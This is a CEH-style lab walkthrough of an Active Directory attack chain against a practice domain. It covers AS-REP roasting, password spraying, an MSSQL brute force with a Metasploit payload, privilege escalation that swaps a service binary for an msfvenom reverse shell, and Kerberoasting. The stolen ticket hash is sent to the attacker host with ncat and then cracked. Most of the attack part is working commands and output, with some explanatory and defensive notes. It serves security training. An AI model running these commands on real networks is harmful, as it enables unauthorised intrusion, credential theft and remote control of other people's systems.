# 5. Active Directory (AD) Attacks

### Task 1: Perform Initial Scans to Obtain Domain Controller IP and Domain Name

The initial scan in AD enumeration is crucial as it identifies the network structure, open ports, and services. This information helps ethical hackers map the AD environment, uncover vulnerabilities, and plan targeted attacks to assess security measures and identify potential weaknesses.

```
nmap 10.10.1.0/24
```

<figure><img src="https://2218819509-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FrUBnODuUX4EQ8P27uc5D%2Fuploads%2F3RnWWwK62JMrzU6JuJIl%2Fimage.png?alt=media&#x26;token=6039d7f6-76f9-457f-adc5-a7d7de433eb7" alt=""><figcaption></figcaption></figure>

**Port 88/TCP** (**kerberos-sec**) and **port 389/TCP** (**LDAP**) are open on this host, which identifies our DC as **10.10.1.22**: a KDC and a directory service on the same machine is the signature of a domain controller, and 636, 3268 and 3269 (LDAPS and the global catalog) usually accompany them.<br>

#### Detailed scan

```
nmap -A -sC -sV 10.10.1.22
```

`-A` already turns on version detection and the default scripts (plus OS detection and traceroute), so `-sC -sV` is redundant here; it is the version probe against 389/TCP that reveals the domain.

<figure><img src="https://2218819509-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FrUBnODuUX4EQ8P27uc5D%2Fuploads%2FkTrk44bJ1y3yfXEFFMZR%2Fimage.png?alt=media&#x26;token=37b433f0-2a62-4655-b3a3-4fff7e173b08" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2218819509-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FrUBnODuUX4EQ8P27uc5D%2Fuploads%2FC2UA3Y6550XmMoiRrIIz%2Fimage.png?alt=media&#x26;token=98782adb-858d-464b-afd8-7d1f9ea6d3c9" alt=""><figcaption></figcaption></figure>

We get the <mark style="color:red;">domain name and FQDN</mark>: the `-sV` banner on 389/TCP reports the AD domain (CEH.com) and the host's fully qualified name, both of which we need for the Kerberos-based attacks in the next tasks.
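The two facts this task extracts, the DC address (from the port pattern) and the domain name (from the LDAP version banner), can be pulled out of nmap's grepable output mechanically. The script below is an added example, not part of the original lab: it parses `-oG` lines, flags hosts that expose Kerberos and LDAP together, and strips the `0.` that nmap's LDAP probe tends to append to the domain name. The scan lines are constructed to resemble this lab's subnet and are not the page's real results.

```python
import re

# Constructed sample in nmap's grepable (-oG) format, modelled on this lab's subnet. These lines
# are not the page's scan results; the version strings mimic what -sV prints for a DC.
SAMPLE_GNMAP = """\
Host: 10.10.1.22 ()\tStatus: Up
Host: 10.10.1.40 ()\tPorts: 445/open/tcp//microsoft-ds///, 3389/open/tcp//ms-wbt-server//Microsoft Terminal Services/\tIgnored State: closed (998)
Host: 10.10.1.22 ()\tPorts: 53/open/tcp//domain//Simple DNS Plus/, 88/open/tcp//kerberos-sec//Microsoft Windows Kerberos/, 389/open/tcp//ldap//Microsoft Windows Active Directory LDAP (Domain: CEH.com0., Site: Default-First-Site-Name)/, 445/open/tcp//microsoft-ds///, 636/open/tcp//tcpwrapped///, 3268/open/tcp//ldap//Microsoft Windows Active Directory LDAP (Domain: CEH.com0., Site: Default-First-Site-Name)/\tIgnored State: closed (994)
Host: 10.10.1.30 ()\tPorts: 445/open/tcp//microsoft-ds///, 1433/open/tcp//ms-sql-s//Microsoft SQL Server/\tIgnored State: closed (998)
"""

# Ports a domain controller exposes together; 88 + 389 alone is already a strong signal.
DC_PORTS = {88: "kerberos", 389: "ldap", 464: "kpasswd", 636: "ldaps", 3268: "gc", 3269: "gc-ssl"}
# One -oG port field is port/state/protocol/owner/service/rpcinfo/version/
PORT_FIELD = re.compile(r"(\d+)/open/tcp//([^/]*)//([^/]*)/")
HOST_LINE = re.compile(r"Host: (\S+) .*?\tPorts: (.*?)(?:\t|$)")


def parse_gnmap(text):
    """Map host -> {port: (service, version)} from the 'Ports:' lines of a -oG file."""
    hosts = {}
    for line in text.splitlines():
        m = HOST_LINE.match(line)
        if not m:
            continue
        ports = hosts.setdefault(m.group(1), {})
        for port, service, version in PORT_FIELD.findall(m.group(2)):
            ports[int(port)] = (service, version)
    return hosts


def likely_domain_controllers(hosts):
    """Hosts with Kerberos and LDAP open; the other DC ports just raise confidence."""
    found = []
    for host, ports in hosts.items():
        hits = sorted(p for p in DC_PORTS if p in ports)
        if 88 in hits and 389 in hits:
            found.append((host, hits))
    return found


def domain_from_ldap_banner(hosts, host):
    """-sV's LDAP probe reports 'Domain: X, Site: Y'. nmap usually prints the DNS name with a
    trailing '0.' left over from the length-prefixed label encoding, so strip that."""
    for port in (389, 3268):
        version = hosts.get(host, {}).get(port, ("", ""))[1]
        m = re.search(r"Domain: ([^,)]+)", version)
        if m:
            name = m.group(1)
            return name[:-2] if name.endswith("0.") else name
    return None


if __name__ == "__main__":
    hosts = parse_gnmap(SAMPLE_GNMAP)
    for dc, hits in likely_domain_controllers(hosts):
        print(dc, [DC_PORTS[p] for p in hits], domain_from_ldap_banner(hosts, dc))
```

Feed it a real file with `nmap -sV -oG scan.gnmap 10.10.1.0/24` and `parse_gnmap(open("scan.gnmap").read())`; on a larger network the same port rule separates DCs from member servers that merely expose SMB.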

### Task 2: Perform AS-REP Roasting Attack <a href="#task-2-perform-as-rep-roasting-attack" id="task-2-perform-as-rep-roasting-attack"></a>

An AS-REP roasting attack targets AD user accounts that have Kerberos pre-authentication disabled (the DONT\_REQ\_PREAUTH flag in userAccountControl). For such an account anyone who can reach the KDC can send an AS-REQ in the user's name without proving knowledge of the password.

The DC answers with an AS-REP. The TGT inside it is encrypted with the krbtgt key and is useless to us, but the response's encrypted part is protected with a key derived from the user's password (for RC4-HMAC, etype 23, that key is simply the user's NT hash). The attacker saves that blob in a crackable form and feeds it to Hashcat or John the Ripper, which turn each candidate password into a key and test it against the blob offline; the right candidate decrypts it and reveals the password. Nothing fails or locks out on the DC side, because no wrong password is ever sent.

```
python3 GetNPUsers.py CEH.com/ -no-pass -usersfile /root/ADtools/users.txt -dc-ip 10.10.1.22
```

* **GetNPUsers.py**: Impacket script that sends an AS-REQ for each listed user and prints the crackable part of the AS-REP for any account that has pre-authentication disabled.
* **CEH.com/**: Target AD domain; nothing follows the slash, so the requests are unauthenticated.
* **-no-pass**: Do not prompt for a password. The DC only answers names whose accounts do not require pre-authentication; everyone else yields an error, which is how the vulnerable accounts are identified.
* **-usersfile /root/ADtools/users.txt**: File with candidate usernames, one per line.
* **-dc-ip 10.10.1.22**: IP address of the DC to query.

Without credentials the script can only test names you already know. With a valid domain account (`CEH.com/user:password`) and `-request` it queries LDAP for the vulnerable accounts itself.

<figure><img src="https://2218819509-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FrUBnODuUX4EQ8P27uc5D%2Fuploads%2FiPqvgZxnHWcCwpp7Wce9%2Fimage.png?alt=media&#x26;token=fc1d687d-d550-4143-824a-ceb2a84f2d1a" alt=""><figcaption></figcaption></figure>

Kali packages Impacket's scripts with an `impacket-` prefix, so the same request looks like this (the example below is against a different lab, hence the different DC IP and domain):

```
impacket-GetNPUsers -dc-ip 10.10.10.161 -request -no-pass -usersfile users.txt  htb.local/
```

Without a user list, the script instead asks LDAP for every account that has pre-authentication disabled; that only works when the DC permits anonymous binds or you supply credentials (`domain/user:password`):

```
impacket-GetNPUsers -dc-ip 10.10.10.161 -request htb.local/
```

We can observe that the user **Joshua** has **DONT\_REQUIRE\_PREAUTH** set. Because pre-authentication is disabled, the DC returns an AS-REP for that name and the script prints its encrypted part as a `$krb5asrep$23$Joshua@CEH.com:...` line. Copy that whole line and save it as **joshuahash.txt**, for example with **echo '\[HASH]' > joshuahash.txt** (keep the single quotes: the hash contains `$` characters that a double-quoted string would expand).

<figure><img src="https://2218819509-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FrUBnODuUX4EQ8P27uc5D%2Fuploads%2FCk3W6vBIdehECbNyVVIw%2Fimage.png?alt=media&#x26;token=a2b54483-a475-4ac1-bfc0-ee13544d30c4" alt=""><figcaption></figcaption></figure>

Now crack the hash with John the Ripper (the jumbo build detects the `$krb5asrep$` format from the prefix, so no `--format` switch is needed).

```
john --wordlist=/root/ADtools/rockyou.txt joshuahash.txt
```

<figure><img src="https://2218819509-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FrUBnODuUX4EQ8P27uc5D%2Fuploads%2F2bt8yvupcuUZFLv7ll9S%2Fimage.png?alt=media&#x26;token=edd94dad-f6ef-489f-9c59-ff2535de1173" alt=""><figcaption></figcaption></figure>

### Task 3: Spray Cracked Password into Network using CrackMapExec. <a href="#task-3-spray-cracked-password-into-network-using-crackmapexec" id="task-3-spray-cracked-password-into-network-using-crackmapexec"></a>

Using CrackMapExec for password spraying involves leveraging its capabilities to automate the process. For instance, if "cupcake" is a cracked password, CME can be used to test this password against numerous user accounts and services across a network. This approach helps identify other accounts that may be using the same password, facilitating further penetration testing or security assessments.

You can spray the password against whichever services the Nmap scan showed on the targets; CME has protocol modules for SMB, RDP, WinRM and MSSQL among others. Before spraying, read the domain lockout policy (for example `cme smb 10.10.1.22 -u Joshua -p cupcake --pass-pol`) and stay below the threshold per account within the observation window. One known password tried once against many users, as here, is the safe pattern; many passwords against one user is what triggers lockouts.

#### RDP Password spraying

```
cme rdp 10.10.1.0/24 -u /root/ADtools/users.txt -p "cupcake"
```

* **rdp**: Targets the Remote Desktop Protocol (RDP) service.
* **10.10.1.0/24**: IP address range to target, encompassing all hosts within the subnet 10.10.1.0 with a subnet mask of 255.255.255.0.
* **-u /root/ADtools/users.txt**: Specifies the path to the file containing user accounts for authentication.
* **-p "cupcake"**: Password which we cracked using AS-REP Roasting to test against the RDP service on the specified hosts.

<figure><img src="https://2218819509-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FrUBnODuUX4EQ8P27uc5D%2Fuploads%2F3VgDHQC1aU5wQATmNQfb%2Fimage.png?alt=media&#x26;token=a351608f-99f9-46fc-b29f-7e890f6c9bd7" alt=""><figcaption></figcaption></figure>

CME reports a successful login (a `[+]` line) for user **mark** with password **cupcake** on host **10.10.1.40**, so the same password is reused. We can now connect over RDP as **mark**.

<figure><img src="https://2218819509-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FrUBnODuUX4EQ8P27uc5D%2Fuploads%2FFBuHxLENv6Ntt10V7DCj%2Fimage.png?alt=media&#x26;token=30020600-ee1b-4b54-bd3a-f16e2d238b0c" alt=""><figcaption></figcaption></figure>

### Task 4: Perform Post-Enumeration using PowerView <a href="#task-4-perform-post-enumeration-using-powerview" id="task-4-perform-post-enumeration-using-powerview"></a>

PowerView is a PowerShell tool designed for network and AD enumeration. It helps security professionals gather detailed information about user accounts, groups, computers, and domain trusts. PowerView is used to identify potential security weaknesses and misconfigurations in an AD environment. It is commonly employed in penetration testing and red team operations. <mark style="color:red;">It runs in PowerShell on a Windows host, so it is used from a foothold inside the domain (here, the RDP session as mark).</mark>

Launch **PowerShell** by searching for it in the Windows search option, with the execution policy bypassed so that an unsigned script can be loaded. This is not an antivirus bypass: the execution policy is a safety setting, not a security boundary, whereas stock PowerView.ps1 is flagged by Defender, so in a real engagement the script has to be obfuscated or AV disabled first. You should already have downloaded the script to the machine.

```
powershell -EP Bypass
```

Now load PowerView into the session, either by dot-sourcing it with **. .\PowerView\.ps1** or with Import-Module:

```
Import-Module .\PowerView.ps1
```
```

<figure><img src="https://2218819509-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FrUBnODuUX4EQ8P27uc5D%2Fuploads%2Fjqk7yjj88lG3DW735BXO%2Fimage.png?alt=media&#x26;token=a90d412b-912b-4a9e-b33b-aa50c42a8daf" alt=""><figcaption></figcaption></figure>

Execute **Get-NetComputer** in PowerShell. It queries the domain for every computer object, which lists the machines in the domain and helps identify targets while mapping the AD environment.

```
Get-NetComputer
```

<figure><img src="https://2218819509-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FrUBnODuUX4EQ8P27uc5D%2Fuploads%2FmLhpppXeI59g1BrBn0Hi%2Fimage.png?alt=media&#x26;token=acf8ee1c-8cec-4be7-90a7-b7b57b4587e0" alt=""><figcaption></figcaption></figure>

Execute **Get-NetGroup** in PowerShell. The Get-NetGroup command in PowerView lists all groups in AD, which helps in identifying group memberships and potential targets for privilege escalation.

```
Get-NetGroup
```

<figure><img src="https://2218819509-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FrUBnODuUX4EQ8P27uc5D%2Fuploads%2F3XVSQyGl2CaIP4SiKXn9%2Fimage.png?alt=media&#x26;token=9f9b521d-57e9-4714-ba10-542624920c57" alt=""><figcaption></figcaption></figure>

Execute command **Get-NetUser** in PowerShell. Get-NetUser in PowerView retrieves detailed information about AD user accounts, such as usernames and group memberships. It helps identify potential targets and understand the AD environment better.

```
Get-NetUser
```

<figure><img src="https://2218819509-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FrUBnODuUX4EQ8P27uc5D%2Fuploads%2FdhM0N5E6ZoBuPgWKvvxm%2Fimage.png?alt=media&#x26;token=33179a90-a45a-4b23-9173-3f0c21e24691" alt=""><figcaption></figcaption></figure>

The output also lists an account named **SQL\_srv**. Its attributes in the screenshot point to a privileged service account, which makes it a good target for the next task.

<figure><img src="https://2218819509-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FrUBnODuUX4EQ8P27uc5D%2Fuploads%2F6YM2SI208YwaAO4PKTgX%2Fimage.png?alt=media&#x26;token=756784f9-280b-439b-839b-9e828f0b3165" alt=""><figcaption></figcaption></figure>

Here are some other listed commands that you can use with **PowerView\.ps1** for enumeration:

* **Get-NetOU** - Lists all organizational units (OUs) in the domain.
* **Get-NetSession** - Lists active SMB sessions on a given machine (`-ComputerName`), which shows where users are connecting from.
* **Get-NetLoggedon** - Lists users currently logged on to a given machine (recent Windows versions restrict both calls to administrators).
* **Get-NetProcess** - Lists processes running on domain machines.
* **Get-NetService** - Lists services on domain machines.
* **Get-NetDomainTrust** - Lists domain trust relationships.
* **Get-ObjectACL** - Retrieves ACLs for a specified object.
* **Find-InterestingDomainAcl** - Finds interesting ACLs in the domain.
* **Get-NetSPN** - Lists service principal names (SPNs) in the domain.
* **Invoke-ShareFinder** - Finds shared folders in the domain.
* **Invoke-UserHunter** - Finds machines where domain admins (or a chosen user or group) are logged on, the classic path to a privileged credential.
* **Invoke-CheckLocalAdminAccess** - Checks if the current user has local admin access on specified machines.

### Task 5: Perform Attack on MSSQL service <a href="#task-5-perform-attack-on-mssql-service" id="task-5-perform-attack-on-mssql-service"></a>

**xp\_cmdshell** is a SQL Server stored procedure that runs operating-system commands from T-SQL. It is disabled by default; enabling and calling it requires the sysadmin role (or an explicit grant), and the commands run under the SQL Server service account. A misconfigured or exposed xp\_cmdshell therefore turns a database login into arbitrary command execution on the host, with data exfiltration and further network compromise following from that. Proper configuration and least-privilege service accounts are what limit the damage.

The service runs on port 1433 on **10.10.1.30** (seen in the Task 1 scan) and we will brute-force the password first.

Save the username **SQL\_srv** in a text file and name it **user.txt** using the command **pluma user.txt**.

Now, brute-force the password for MSSQL. Hydra's `mssql` module uses SQL Server authentication, and the server logs every wrong guess as a failed login (event 18456), so this is noisy.

```
hydra -L user.txt -P /root/ADtools/rockyou.txt 10.10.1.30 mssql
```

<figure><img src="https://2218819509-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FrUBnODuUX4EQ8P27uc5D%2Fuploads%2FDUP5Wc5Q9d4wQuiQl3In%2Fimage.png?alt=media&#x26;token=e748804e-b4d7-42bd-88b8-e44b8ab0a550" alt=""><figcaption></figcaption></figure>

We have successfully cracked the password for **SQL\_srv**, which is "**batman**". Next, we will log into the service using Impacket's **mssqlclient.py**. Without `-windows-auth` the client performs a SQL Server login as SQL\_srv and the domain prefix is ignored; add `-windows-auth` if the account is a domain account instead.

```
python3 /root/impacket/examples/mssqlclient.py CEH.com/SQL_srv:batman@10.10.1.30 -port 1433
```

Now check whether xp\_cmdshell is enabled. `value` is the configured setting and `value_in_use` the running one; a 1 means the procedure is callable. If it is 0 and the login is sysadmin, mssqlclient's built-in `enable_xp_cmdshell` command turns it on (it runs `sp_configure` for you).

```
SELECT name, CONVERT(INT, ISNULL(value, value_in_use)) AS IsConfigured FROM sys.configurations WHERE name='xp_cmdshell';
```

<figure><img src="https://2218819509-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FrUBnODuUX4EQ8P27uc5D%2Fuploads%2FWEDBP40lJZ2fFxTwmupX%2Fimage.png?alt=media&#x26;token=41e1577b-ee9a-49a9-b359-cc55b7a0f7da" alt=""><figcaption><p>A value of 1, indicating that xp_cmdshell is enabled on the server</p></figcaption></figure>

Now that we know **xp\_cmdshell** is enabled and we hold a login that can call it, Metasploit's `mssql_payload` module can use it to run a payload on the SQL host. `RHOSTS` is the current option name (`RHOST` is still accepted as an alias); set `LHOST` to the attacker's address and launch the module.

```
use exploit/windows/mssql/mssql_payload
set RHOSTS 10.10.1.30
set USERNAME SQL_srv
set PASSWORD batman
set DATABASE master
set LHOST 10.10.1.13
exploit
```

<figure><img src="https://2218819509-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FrUBnODuUX4EQ8P27uc5D%2Fuploads%2F4dYdNmScayDM5eE8RCsw%2Fimage.png?alt=media&#x26;token=c1752d09-210c-4e56-a93f-4ba59fe58205" alt=""><figcaption></figcaption></figure>

Once the exploitation is complete, we will be getting a Meterpreter session. You can move to shell by typing **shell.**

### Task 6: Perform Privilege Escalation <a href="#task-6-perform-privilege-escalation" id="task-6-perform-privilege-escalation"></a>

winPEASx64.exe is an enumeration tool that checks a Windows host for privilege-escalation opportunities: weak service configurations, writable paths, credentials left in files and the like.

An unquoted service path is a service whose ImagePath contains spaces and is not wrapped in quotes, for example `C:\Program Files\CEH Services\file.exe`. When the Service Control Manager starts it, CreateProcess tries `C:\Program.exe`, then `C:\Program Files\CEH.exe`, before the real binary; if one of those directories is writable, a planted executable runs with the service's privileges (often SYSTEM) at the next service start or reboot. The same winPEAS output also shows whether the service's own directory is writable, in which case the binary can simply be replaced, which is what this task does.

It is assumed that you still have the shell from last task.

Move to **C:\Users\Public\Downloads** using **cd** and execute the command **powershell**.

<figure><img src="https://2218819509-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FrUBnODuUX4EQ8P27uc5D%2Fuploads%2FnniigqhUX7VO20rbZJnq%2Fimage.png?alt=media&#x26;token=52ac1dde-ef96-46ca-af5d-3ccc02d46237" alt=""><figcaption></figcaption></figure>

Now, we need to host winPEASx64.exe on the attacker machine using Python. Open a new terminal, type **sudo su**, press **Enter**, and use **toor** as password. Execute the command **cd /root/ADtools**.

Type **python3 -m http.server** and press **Enter** to host the **winPEASx64.exe** file.

<figure><img src="https://2218819509-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FrUBnODuUX4EQ8P27uc5D%2Fuploads%2FOTkXBp1nuCrm9LJDuVKh%2Fimage.png?alt=media&#x26;token=1ef9a9e0-86b9-4fba-83b5-099409f0ce02" alt=""><figcaption></figcaption></figure>

Get back to the shell terminal. In PowerShell `wget` is only an alias for `Invoke-WebRequest`, so name its **-OutFile** parameter explicitly (the short `-o` is ambiguous with other parameters):

```
wget http://10.10.1.13:8000/winPEASx64.exe -OutFile winpeas.exe
```

Once winpeas.exe is downloaded, execute it:

```
.\winpeas.exe
```

<figure><img src="https://2218819509-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FrUBnODuUX4EQ8P27uc5D%2Fuploads%2Fwqjl2pkpLXjz5EXVQ65B%2Fimage.png?alt=media&#x26;token=a5f1b8af-fc24-407d-84d3-4b7c1bd87ef3" alt=""><figcaption></figcaption></figure>

Once the execution is completed, observe the output. winPEAS flags the service binary **file.exe** in **C:\Program Files\CEH Services** because its path is unquoted. The steps below do not plant `C:\Program Files\CEH.exe`; they replace file.exe itself, which only works because that directory is writable by our user. Either weakness gives code execution as the service account.

<figure><img src="https://2218819509-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FrUBnODuUX4EQ8P27uc5D%2Fuploads%2FWqCItugYCgpaxUYe5r6g%2Fimage.png?alt=media&#x26;token=709abc99-0da9-400b-bd86-9cc9c93de488" alt=""><figcaption></figcaption></figure>
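To see exactly which paths an unquoted ImagePath exposes, and why this lab ends up replacing the binary rather than planting one, here is an added Python example (not part of the original page) that reproduces CreateProcess's splitting rule and checks each candidate's directory against a list of writable directories. The service entries and the writable-directory list are constructed for the demonstration; on a real host the ACL facts come from `icacls` or winPEAS.

```python
import ntpath


def createprocess_candidates(image_path):
    """Executables Windows will try, in order, when starting a service from this ImagePath.
    CreateProcess splits an unquoted command line at every space and appends .exe to each
    prefix that lacks an extension; a quoted path or a space-free path yields only the
    real binary. Candidates stop at the real executable; the rest are its arguments."""
    cmd = image_path.strip()
    if cmd.startswith('"'):
        return [cmd[1:cmd.index('"', 1)]]
    tokens = cmd.split(" ")
    candidates = []
    for i in range(1, len(tokens) + 1):
        prefix = " ".join(tokens[:i])
        candidates.append(prefix if prefix.lower().endswith(".exe") else prefix + ".exe")
        if prefix.lower().endswith(".exe"):
            break
    return candidates


def assess(image_path, writable_dirs):
    """Separate the two abuses: planting a file on the search path (true unquoted-path
    hijack) versus overwriting the real binary (weak ACL on its directory)."""
    writable = {d.lower().rstrip("\\") for d in writable_dirs}
    cands = createprocess_candidates(image_path)
    real = cands[-1]
    plant = [c for c in cands[:-1] if ntpath.dirname(c).lower().rstrip("\\") in writable]
    return {"binary": real, "plantable": plant,
            "replaceable": ntpath.dirname(real).lower().rstrip("\\") in writable}


# Constructed sample modelled on the lab: the service winPEAS flagged, a quoted vendor service
# and a system service for contrast. Which directories are writable is assumed for the demo
# (on a real host, read it from icacls or winPEAS's "Services Information" section).
SERVICES = {
    "CEHService": r"C:\Program Files\CEH Services\file.exe",
    "VendorAgent": r'"C:\Program Files\Some Vendor\agent.exe" -service',
    "Spooler": r"C:\Windows\System32\spoolsv.exe",
}
WRITABLE_DIRS = [r"C:\Program Files\CEH Services"]


if __name__ == "__main__":
    for name, path in SERVICES.items():
        print(name, assess(path, WRITABLE_DIRS))
```

With the lab's writable directory the result for CEHService is no plantable path but `replaceable: True`, which is the binary swap performed in the next steps; had only `C:\Program Files` been writable, the hijack would instead be `C:\Program Files\CEH.exe`. The fix is the same in both cases: quote the ImagePath and make sure only administrators can write to the binary's directory.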

Open a new terminal with root privileges using the command sudo su and **toor** as password and create a payload. The file will be started by the Service Control Manager in place of the service binary; a plain executable never reports back to the SCM, so Windows gives up on the "service" after its start timeout (error 1053) and the shell can die soon after. For a shell that survives, generate a service-aware wrapper with `-f exe-service` instead of `-f exe`; the plain binary is enough to demonstrate the weakness here.

```
msfvenom -p windows/shell_reverse_tcp lhost=10.10.1.13 lport=8888 -f exe > /root/ADtools/file.exe
```

In another terminal, start a listener on the payload's port:

```
nc -nvlp 8888
```

<figure><img src="https://2218819509-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FrUBnODuUX4EQ8P27uc5D%2Fuploads%2FbkWbUSm2i95KN0TXKQU0%2Fimage.png?alt=media&#x26;token=10fde205-57dd-4a5b-8b9e-2067fce7751d" alt=""><figcaption></figcaption></figure>

Get back to our shell terminal and move to C:\Program Files\CEH Services. Execute the command

```
cd ../../.. ; cd "Program Files/CEH Services"
```

<figure><img src="https://2218819509-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FrUBnODuUX4EQ8P27uc5D%2Fuploads%2FHBpHqTJbYiMEpnxlY8k2%2Fimage.png?alt=media&#x26;token=bb28f343-1c74-4f8c-8f2a-e76c9ed6c52d" alt=""><figcaption></figcaption></figure>

Execute the command. It renames the original binary so it can be restored afterwards, then downloads the payload under the service's expected name (again with `-OutFile`; this only succeeds because the directory is writable):

```
move file.exe file.bak ; wget http://10.10.1.13:8000/file.exe -OutFile file.exe
```

<figure><img src="https://2218819509-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FrUBnODuUX4EQ8P27uc5D%2Fuploads%2FMROZyYDsb7wUVVZLjNwv%2Fimage.png?alt=media&#x26;token=93990896-e526-4913-be4a-bf587fd618c9" alt=""><figcaption></figcaption></figure>

Switch to the Windows Server 2019 (AD) machine, assuming we are the victim now. Restart the machine by hovering over the **Power and Display** button and clicking the **Reset/Reboot** button in the toolbar above the virtual machine, then log in with the username **SQL\_srv** and password **batman**. On boot the SCM starts the service, which now runs our file.exe with the service's privileges, and the listener on Parrot OS receives the shell.

### Task 7: Perform Kerberoasting Attack <a href="#task-7-perform-kerberoasting-attack" id="task-7-perform-kerberoasting-attack"></a>

Rubeus is a C# toolkit for Kerberos abuse on Windows. Kerberoasting targets accounts that have a service principal name (SPN) registered, which in practice means service accounts. Any authenticated domain user can ask the DC for a service ticket (TGS) for such an SPN; that ticket is encrypted with the service account's key (for RC4-HMAC, its NT hash), so it can be taken offline and cracked to recover the account's password. The attack works because service accounts often have old, weak, never-rotated passwords, and because requesting tickets is normal Kerberos behaviour that raises no error on the DC.

<mark style="color:red;">**We assume that we already have a shell on a Windows system, i.e. a domain identity inside the AD environment (here, the reverse shell from the previous task).**</mark>

In the netcat shell, execute the **powershell** command to launch PowerShell, then move to C:\Users\Public\Downloads (from C:\Program Files\CEH Services, two levels up is the drive root):

```
cd ../.. ; cd Users\Public\Downloads
```

<figure><img src="https://2218819509-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FrUBnODuUX4EQ8P27uc5D%2Fuploads%2FBmHW2vFJaE87h1WMKSVE%2Fimage.png?alt=media&#x26;token=22dc09fb-7260-429b-a8ca-729ac75b387e" alt=""><figcaption></figcaption></figure>

Now download Rubeus and ncat from the Python web server started in the previous task (both files must be in /root/ADtools). Execute the command

```
wget http://10.10.1.13:8000/Rubeus.exe -OutFile rubeus.exe ; wget http://10.10.1.13:8000/ncat.exe -OutFile ncat.exe
```

<figure><img src="https://2218819509-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FrUBnODuUX4EQ8P27uc5D%2Fuploads%2F7JiSt2hW1AkaLXvWRhd0%2Fimage.png?alt=media&#x26;token=0ba8cd5b-b7ab-4dbb-a55d-eee39d05a96d" alt=""><figcaption></figcaption></figure>

Now ask Rubeus to request a service ticket for every account with an SPN and write the results to a file. By default Rubeus writes hashcat-style `$krb5tgs$23$...` lines; add `/format:john` if you intend to crack with John.

```
rubeus.exe kerberoast /outfile:hash.txt
```

<figure><img src="https://2218819509-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FrUBnODuUX4EQ8P27uc5D%2Fuploads%2FKQMJ1bMynCI8X436Ittn%2Fimage.png?alt=media&#x26;token=a007bd49-2c1d-4931-8a8a-6290d07ce807" alt=""><figcaption></figcaption></figure>

After kerberoasting, the encrypted service ticket for **DC-Admin**, an account that has an SPN registered, is saved in the **hash.txt** file.

To get that hash file on the attacker machine, we will be using netcat. Open a new terminal, type **sudo su** and press **Enter**; use **toor** as password. Then execute the command

```
nc -lvp 9999 > hash.txt
```

<figure><img src="https://2218819509-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FrUBnODuUX4EQ8P27uc5D%2Fuploads%2FkRmsEYXEI20EluI3LpaZ%2Fimage.png?alt=media&#x26;token=a8971f70-30f2-4383-96ba-32d634b60f35" alt=""><figcaption></figcaption></figure>

In the shell terminal, execute the command.

```
ncat.exe -w 3 10.10.1.13 9999 < hash.txt
```

<figure><img src="https://2218819509-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FrUBnODuUX4EQ8P27uc5D%2Fuploads%2FkHq0whjBNPRpYW7adN7P%2Fimage.png?alt=media&#x26;token=db3f2f99-346f-4b69-8e1b-81b710a5c367" alt=""><figcaption></figcaption></figure>

Get back to the netcat listener terminal and press **Enter** to save the file.

Now, we will be using HashCat to crack the password hash

```
hashcat -m 13100 --force -a 0 hash.txt /root/ADtools/rockyou.txt
```

* -m 13100: the hash mode. 13100 is Kerberos 5 TGS-REP with etype 23 (RC4-HMAC), the format Rubeus wrote; the AS-REP hash from Task 2 would be mode 18200 instead.
* \--force: This option forces Hashcat to ignore warnings and run even if there are compatibility issues. Use this with caution, as it might cause instability or incorrect results.
* -a 0: This specifies the attack mode. 0 stands for a straight attack, which is a simple dictionary attack where Hashcat tries each password in the dictionary as it is.
* hash.txt: is the input file containing the hashes to crack
* /root/ADtools/rockyou.txt: is the wordlist file used for the attack

<figure><img src="https://2218819509-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FrUBnODuUX4EQ8P27uc5D%2Fuploads%2FxAcge07yfFBu0PiXmd1w%2Fimage.png?alt=media&#x26;token=d7907aeb-c529-4910-95a9-a3b78b55f030" alt=""><figcaption></figcaption></figure>

After completion we get the password **advanced!**. As DC-Admin has high privileges on the domain, this credential can be used for further attacks; the lesson is that any SPN account with a guessable password is crackable by every authenticated user.
